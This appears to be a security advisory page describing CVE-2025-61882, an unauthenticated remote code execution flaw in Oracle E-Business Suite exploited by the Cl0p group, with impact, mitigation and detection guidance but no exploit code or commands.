NAVANEM
CVE-2025-61882⚡ exploited in the wild

Oracle E-Business Suite, unauthenticated remote code execution (Cl0p EBS campaign)

An easily exploitable vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing (part of Oracle E-Business Suite) lets an unauthenticated attacker with HTTP network access compromise the product, resulting in takeover and remote code execution. It was exploited as a zero-day by the Cl0p extortion group for large-scale data theft.

Overview

CVE-2025-61882 is a critical, unauthenticated remote code execution vulnerability in Oracle E-Business Suite (EBS), specifically the BI Publisher Integration of the Concurrent Processing component. An attacker with only HTTP network access can compromise the application and execute code without credentials. The Cl0p extortion group exploited it as a zero-day in 2025 for mass data theft, hitting numerous large enterprises before Oracle's emergency alert.

Technical Details

The flaw is reachable pre-authentication via the EBS web tier. Public analysis describes an exploit chain combining server-side request forgery and template/XSL injection in the BI Publisher integration that culminates in arbitrary code execution on the application server. Oracle released a Security Alert (outside the normal quarterly Critical Patch Update cycle) and published indicators after exploit tooling leaked. Affected versions span EBS 12.2.3 through 12.2.14.

Impact

  • Unauthenticated RCE on internet-facing or internally-reachable EBS application servers.
  • Mass data exfiltration: Cl0p used access to steal large volumes of business data for extortion.
  • ERP-wide exposure: EBS holds finance, HR, supply-chain, and customer data.
  • High-profile victims were named in the Cl0p extortion campaign, driving intense scrutiny.

Mitigation

  1. Apply Oracle's Security Alert update for CVE-2025-61882 immediately; it requires the October 2023 EBS CPU as a prerequisite baseline.
  2. Review Oracle's published IOCs (attacker IPs, file artifacts) and hunt retrospectively - exploitation predates disclosure.
  3. Restrict EBS web-tier exposure to the internet; place it behind VPN/WAF and segment it.
  4. Rotate credentials and secrets accessible from the EBS application tier and audit for unauthorized data access.

Detection

  • Search EBS access logs for anomalous requests to BI Publisher / Concurrent Processing endpoints.
  • Match against Oracle and Rapid7 published indicators for the Cl0p campaign.
  • Investigate outbound connections from the EBS server to unknown hosts; CISA added the CVE to KEV on October 6, 2025 with a ransomware-use flag.

references

#cve-2025-61882#oracle#e-business-suite#cl0p#remote-code-execution#authentication-bypass#cwe-287#actively-exploited#cisa-kev#critical-vulnerability

Related topics

CVE
CVE

Fortinet FortiWeb, relative path traversal authentication bypass to admin RCE

Nov 14, 2025
CVE
CVE

CrushFTP, authentication bypass via AS2 validation (admin-access zero-day)

Jul 18, 2025
CVE
CVE

Palo Alto Networks PAN-OS, GlobalProtect authentication bypass

May 13, 2026
CVE
CVE

BeyondTrust Remote Support / Privileged Remote Access, pre-authentication OS command injection RCE

Feb 6, 2026
CVE
CVE

Fortinet multiple products, authentication bypass via FortiCloud SSO (alternate-channel)

Jan 27, 2026
CVE
CVE

F5 BIG-IP APM, unauthenticated remote code execution via crafted access-policy traffic

Oct 15, 2025
CVE
CVE

Microsoft Windows Server Update Services (WSUS), deserialization RCE

Oct 14, 2025
CVE
CVE

Cisco Secure Firewall ASA & FTD, VPN web server buffer overflow RCE (ArcaneDoor)

Sep 25, 2025
CVE
CVE

Google Chrome V8, type confusion leading to heap corruption (zero-day)

Sep 24, 2025
CVE
CVE

Fortra GoAnywhere MFT, deserialization RCE (License Servlet)

Sep 18, 2025